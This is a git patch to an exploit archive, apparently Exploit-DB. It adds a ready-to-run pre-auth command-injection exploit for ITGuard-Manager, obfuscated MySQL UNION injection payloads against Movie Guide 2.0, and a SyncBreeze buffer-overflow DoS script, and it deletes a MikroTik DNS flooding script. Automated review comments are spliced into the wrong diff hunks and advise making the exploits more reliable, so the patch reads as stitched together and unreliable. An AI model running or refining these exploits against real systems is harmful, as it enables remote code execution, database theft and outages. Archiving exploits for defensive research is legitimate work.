From cfef56c321b2731b6126e31526cd26232bf1531c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 16 Dec 2017 05:02:18 +0000
Subject: [PATCH] DB: 2017-12-16
5 changes to exploits/shellcodes
MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service
Sync Breeze 10.2.12 - Denial of Service
ITGuard-Manager 0.0.0.1 - Remote Code Execution
Movie Guide 2.0 - SQL Injection
---
 exploits/cgi/webapps/43343.py | 49 +++++++++++++++++++
 exploits/hardware/dos/43200.py | 41 ----------------
 exploits/php/webapps/43346.txt | 51 ++++++++++++++++++++
 exploits/windows/dos/43344.py | 88 ++++++++++++++++++++++++++++++++++
 files_exploits.csv | 4 +-
 5 files changed, 191 insertions(+), 42 deletions(-)
 create mode 100755 exploits/cgi/webapps/43343.py
 delete mode 100755 exploits/hardware/dos/43200.py
 create mode 100644 exploits/php/webapps/43346.txt
 create mode 100755 exploits/windows/dos/43344.py
diff --git a/exploits/cgi/webapps/43343.py b/exploits/cgi/webapps/43343.py
new file mode 100755
index 000000000..8ac0d2bf5
--- /dev/null
+++ b/exploits/cgi/webapps/43343.py
@@ -0,0 +1,49 @@
+# Vulnerability Title: ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution
+# Author: Nassim Asrir
+# Contact: wassline@gmail.com / @asrir_nassim
+# CVE: Waiting ...
+# CVSS: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P
+# Vendor: http://www.innotube.com
+
+
+Details:
+========
+
+First we need to know what happens when we need to LogIn.
+When the User or Attacker insert any strings in the login form he/she will get this POST request:
+
+POST /cgi-bin/drknow.cgi?req=login HTTP/1.1
+Host: server
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Referer: http://server/log-in.html?lang=KOR
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 45
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+req=login&lang=KOR&username=admin&password=admin
+
+
+Ok now we have this POST request and all we care about is the ‘username’ parameter . and we
+can execute our system commands via this parameter due to missing input sanitization.
+The payload will be: 'admin|'command'||x we will change the command by any *unix command (ls – id – mkdir ….)
+
+Exploit:
+=======
+
+#i am not responsible for any wrong use.
+
+import requests
+target = raw_input('Target(With proto) : ')
+command = raw_input('Command To Execute : ')
+fullpath=target +"/cgi-bin/drknow.cgi?req=login"
+data = {'req':'login',
+ 'lang':'ENG',
+ 'username':'admin|'+command+'||x',
+ 'password':'admin'}
+
+execute = requests.post(fullpath, data = data)
+
+print execute.text
\ No newline at end of file
diff --git a/exploits/hardware/dos/43200.py b/exploits/hardware/dos/43200.py
deleted file mode 100755
index 7759591e6..000000000
--- a/exploits/hardware/dos/43200.py
+++ /dev/null
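Review bot: The `requests.post(fullpath, data = data)` call at the end of the hunk has no timeout, so an injected command that blocks (or a target that never answers) hangs the script indefinitely; it should read `execute = requests.post(fullpath, data=data, timeout=10)`. The `# CVSS:` header line is two vectors run together without a separator (`...E:H/MAV:P3.0/AV:P/...`) and both say AV:P (physical), which contradicts the unauthenticated HTTP POST the advisory itself describes — presumably AV:N was intended, so keep one vector and correct it. `raw_input` and `print execute.text` make the script Python 2 only; a `# Tested with: Python 2.7` line in the header would save users a traceback under python3. The captured request's `Content-Length: 45` also does not match the 48-byte body shown beneath it, which suggests the sample was hand-edited.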
@@ -1,41 +0,0 @@
-import socket
-import os
-import time
-from threading import Thread
-import sys
-
-
-def rep1():
- os.system('echo -ne "\x4d\x69\x6b\x72\x6f\x54\x69\x6b\x20\x44\x65\x6e\x69\x61\x6c\x20\x6f\x66\x20\x53\x65\x72\x76\x69\x63\x65\x20\x6f\x6e\x20\x44\x4e\x53\x20\x73\x65\x72\x76\x69\x63\x65\x2e\x20\x48\x6f\x73\x65\x69\x6e\x20\x41\x73\x6b\x61\x72\x69" | dd conv=notrunc bs=1000 seek=500 of=/home/constantine/test/poc')
- os.system('cat poc | nc -v 192.168.1.1 53')
-
-def rep2():
- os.system('cat poc | nc -v 192.168.1.1 53')
-
-def rep3():
- os.system('cat poc | nc -v 192.168.1.1 53')
-
-def rep4():
- os.system('cat poc | nc -v 192.168.1.1 53')
-
-def rep5():
- os.system('cat poc | nc -v 192.168.1.1 53')
-
-
-
-if __name__ == "__main__":
- threads = []
- try:
- for a in [rep1, rep2, rep3, rep4, rep5]:
- t = Thread(target=a)
- t.start()
- threads.append(t)
- time.sleep(4)
- time.sleep(4)
- print("For Stopping the attack, Hit CTRL+C now")
-
-
- except KeyboardInterrupt:
- sys.exit(0)
- finally:
- [t.join() for t in threads]
\ No newline at end of file
diff --git a/exploits/php/webapps/43346.txt b/exploits/php/webapps/43346.txt
new file mode 100644
index 000000000..c7a5d22a9
--- /dev/null
+++ b/exploits/php/webapps/43346.txt
@@ -0,0 +1,51 @@
+# # # # #
+# Exploit Title: Movie Guide 2.0 - SQL Injection
+# Dork: N/A
+# Date: 15.12.2017
+# Vendor Homepage: http://applebitemedia.com/
+# Software Link: http://applebitemedia.com/amwdl/AM_Movie_Guide.tar.gz
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/index.php?md=[SQL]
+#
+# %2dV'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
+#
+# 2)
+# http://localhost/[PATH]/index.php?pid=minfo&Movie_Id=[SQL]
+#
+# %2dV'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
+#
+# 3)
+# http://localhost/[PATH]/index.php?director=[SQL]
+#
+# 
a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
+#
+# 4)
+# http://localhost/[PATH]/index.php?actor=[SQL]
+#
+# -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
+#
+# 5)
+# http://localhost/[PATH]/index.php?gterm=[SQL]
+#
+# -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
+#
+# 6)
+# http://localhost/[PATH]/index.php?year=[SQL]
+#
+# 
-a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/windows/dos/43344.py b/exploits/windows/dos/43344.py
new file mode 100755
index 000000000..13242f9be
--- /dev/null
+++ b/exploits/windows/dos/43344.py
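Review bot: The `# Description:` line (`The vulnerability allows an attacker to inject sql commands....`) names neither the sink nor the technique, leaving the reader to reverse six URL-encoded payloads; replace it with something like `# Description: The md, Movie_Id, director, actor, gterm and year GET parameters of index.php reach SQL queries unsanitized; the payloads below are UNION-based and dump table/column names from information_schema.columns.` The `/*!02222UNION*/` version-comment syntax and `export_set()` are MySQL-specific, so a `# DBMS: MySQL` header line would tell users these payloads will not transfer to another backend. Payload 3 (the `director` parameter) begins with `a'` while payloads 4–6 begin with `-a'`; if that is how the file reads and not an artifact of this view, the prefixes should be harmonised or the difference explained.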
@@ -0,0 +1,88 @@
+=============================================
+MGC ALERT 2017-007
+- Original release date: November 30, 2017
+- Last revised: December 14, 2017
+- Discovered by: Manuel García Cárdenas
+- Severity: 7,5/10 (CVSS Base Score)
+- CVE-ID: CVE-2017-17088
+=============================================
+
+I. VULNERABILITY
+-------------------------
+SyncBreeze <= 10.2.12 - Denial of Service
+
+II. BACKGROUND
+-------------------------
+SyncBreeze is a fast, powerful and reliable file synchronization solution
+for local disks, network shares, NAS storage devices and enterprise storage
+systems.
+
+III. DESCRIPTION
+-------------------------
+The Enterprise version of SyncBreeze is affected by a Remote Denial of
+Service vulnerability.
+
+The web server does not check bounds when reading server request in the
+Host header on making a connection, resulting in a classic Buffer Overflow
+that causes a Denial of Service.
+
+To exploit the vulnerability only is needed use the version 1.1 of the HTTP
+protocol to interact with the application.
+
+IV. PROOF OF CONCEPT
+-------------------------
+#!/usr/bin/python
+import sys, socket
+
+host = sys.argv[1]
+buffer="GET / HTTP/1.1\r\n"
+buffer+="Host: "+"A"*2000+"\r\n\r\n"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, 80))
+s.send(buffer)
+s.close()
+
+V. BUSINESS IMPACT
+-------------------------
+Availability compromise can result from these attacks.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+SyncBreeze <= 10.2.12
+
+VII. SOLUTION
+-------------------------
+Vendor release 10.3 version
+http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe
+
+VIII. REFERENCES
+-------------------------
+http://www.syncbreeze.com/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
+
+X. 
REVISION HISTORY
+-------------------------
+November 30, 2017 1: Initial release
+December 14, 2017 2: Revision to send to lists
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
+November 30, 2017 2: Send to vendor
+December 6, 2017 3: Vendor fix the vulnerability and release a new version
+December 14, 2017 4: Send to the Full-Disclosure lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9e66678ab..4ffec1da7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5763,7 +5763,6 @@ id,file,description,date,author,type,platform,port
 43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android,
 43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux,
 43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux,
-43200,exploits/hardware/dos/43200.py,"MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service",2017-11-30,FarazPajohan,dos,hardware,
 43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
 43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows,
 43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple,
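Review bot: The proof of concept's `s.send(buffer)` can return after writing only part of the 2000-byte Host header, in which case the request never reaches the vulnerable code path and the test silently passes; use `s.sendall(buffer)` instead. The script is Python 2 only (a `str` is written to the socket), so under python3 it needs `s.sendall(buffer.encode())` — worth a `#!/usr/bin/python2` shebang or a note in section IV. Section III calls the bug a "classic Buffer Overflow" in the Host-header parser yet the impact is stated only as availability; if the overflow is stack-based the severity may be understated, so a sentence on whether control of the crashing instruction pointer was examined would help readers triage it.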
@@ -5778,6 +5777,7 @@ id,file,description,date,author,type,platform,port
 43326,exploits/multiple/dos/43326.c,"macOS/iOS - Multiple Kernel Use-After-Frees due to Incorrect IOKit Object Lifetime Management in IOTimeSyncClockManagerUserClient",2017-12-12,"Google Security Research",dos,multiple,
 43327,exploits/macos/dos/43327.c,"macOS - Kernel Code Execution due to Lack of Bounds Checking in AppleIntelCapriController::GetLinkConfig",2017-12-12,"Google Security Research",dos,macos,
 43328,exploits/multiple/dos/43328.c,"macOS/iOS - Kernel Double Free due to Incorrect API Usage in Flow Divert Socket Option Handling",2017-12-12,"Google Security Research",dos,multiple,
+43344,exploits/windows/dos/43344.py,"Sync Breeze 10.2.12 - Denial of Service",2017-12-15,"Manuel García Cárdenas",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -38374,3 +38374,5 @@ id,file,description,date,author,type,platform,port
 43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,
 43337,exploits/php/webapps/43337.txt,"Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection",2017-12-14,Akityo,webapps,php,
 43340,exploits/windows/webapps/43340.rb,"Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)",2017-12-14,Metasploit,webapps,windows,4592
+43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi,
+43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80
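Review bot: The new `43346` row records port `80` while the `43343` row added in the same hunk and the `43344` row in the previous hunk leave the port column empty, although all three target an HTTP service on its default port; pick one convention for the three entries so consumers filtering the index by port see consistent results. The `43344` description also spells the product `Sync Breeze` whereas the advisory file added in this commit uses `SyncBreeze` throughout, so a search on the vendor's spelling will miss the entry — `"SyncBreeze 10.2.12 - Denial of Service"` would match the source.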